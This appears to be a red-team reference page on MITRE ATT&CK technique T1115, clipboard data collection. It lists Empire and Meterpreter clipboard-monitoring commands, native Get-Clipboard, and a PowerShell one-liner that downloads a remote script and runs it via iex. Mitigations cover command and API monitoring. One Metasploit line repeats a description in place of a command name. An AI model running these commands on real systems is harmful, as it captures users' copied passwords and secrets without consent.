# Clipboard Data **ATT\&CK ID:** [T1115](https://attack.mitre.org/techniques/T1115/) **Permissions Required:** **User** **Description** Adversaries may collect data stored in the clipboard from users copying information within or between applications. In Windows, Applications can access clipboard data by using the Windows API. \[[Source](https://attack.mitre.org/techniques/T1115/)] ## Techniques ### Empire This module monitors the clipboard on a specified interval for changes to copied\ text. ``` usemodule powershell/collection/clipboard_monitor ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FB8Dbz1d0rLXMpWFimULp%2FEmpire-Clipboard.png?alt=media\&token=13243cc2-e4fa-40d8-88a9-daeebafb5ae3) ### Get-ClipboardContents `Get-ClipboardContents` monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the scripts execution time. ```powershell iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBKbe7hJJUbZC7PZP6ti7%2FGet-ClipboardContents.png?alt=media\&token=c7aa8284-30cb-4789-b79b-06dc6d2248ae) ### Metasploit This Metasploit module can be loaded from the meterpreter shell. ```bash load extapi # Read the target's current clipboard (text, files, images) clipboard_get_data # Dump all captured clipboard content clipboard_monitor_dump # Pause the active clipboard monitor clipboard_monitor_pause # Delete all captured clipboard content without dumping it clipboard_monitor_purge # Resume the paused clipboard monitor clipboard_monitor_resume # Start the clipboard monitor Start the clipboard monitor # Stop the clipboard monitor clipboard_monitor_stop # Write text to the target's clipboard clipboard_set_text ``` ### PowerShell The native PowerShell command `Get-Clipboard` retrieves information that is currently stored in the clipboard. ```powershell Get-Clipboard ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu6ZR7mY3uRqH7zAGhJoP%2FPS-Get-Clipboard.png?alt=media\&token=c9a33b45-630e-4531-b238-3889fcc0dc82) ## Mitigations * Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications. * Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.